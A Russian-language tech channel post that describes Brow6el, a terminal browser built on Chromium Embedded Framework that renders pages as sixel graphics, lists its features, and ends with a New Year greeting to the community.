Как это работает? В основе лежит Chromium Embedded Framework (CEF), который рендерит страницы без графического интерфейса. Затем Brow6el преобразует полученное изображение в sixel-графику — формат, который поддерживают многие терминалы. В результате браузер выводит картинку в терминал и обновляет её в реальном времени. Функции: - поддержка мыши и клавиатуры - обычный ввод и прокрутка - вкладки - менеджер загрузок - система закладок - приватный режим - JavaScript-консоль - внедрять скрипты по шаблону URL Фича: ввод мыши возможен как с реальной мыши, так и через виртуальную мышь, управляемую клавиатурой, что позволяет работать даже если у тебя отсутствует мышь.

Короче забавная штука, пользоваться я этим говнищем не буду, но как концепт потыкать вполне себе достойно.

Возможно тебе сгодится для тайлинга или чего-то еще. Забирай в копилку. 🛠 #utilites #linux #terminal — 💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

С наступающим! Здоровья тебе и твоим близким! Каждому из вас хочу сказать огромное спасибо за вклад в наше уютное сообщество. Вы все прекрасные специалисты, профессионалы и просто хорошие люди. Пусть в 2026 году у тебя всё получится, главное не опускай руки и никого не слушай. Прекрасных тебе праздников и береги себя! Всех обнял 🙃🙃🙃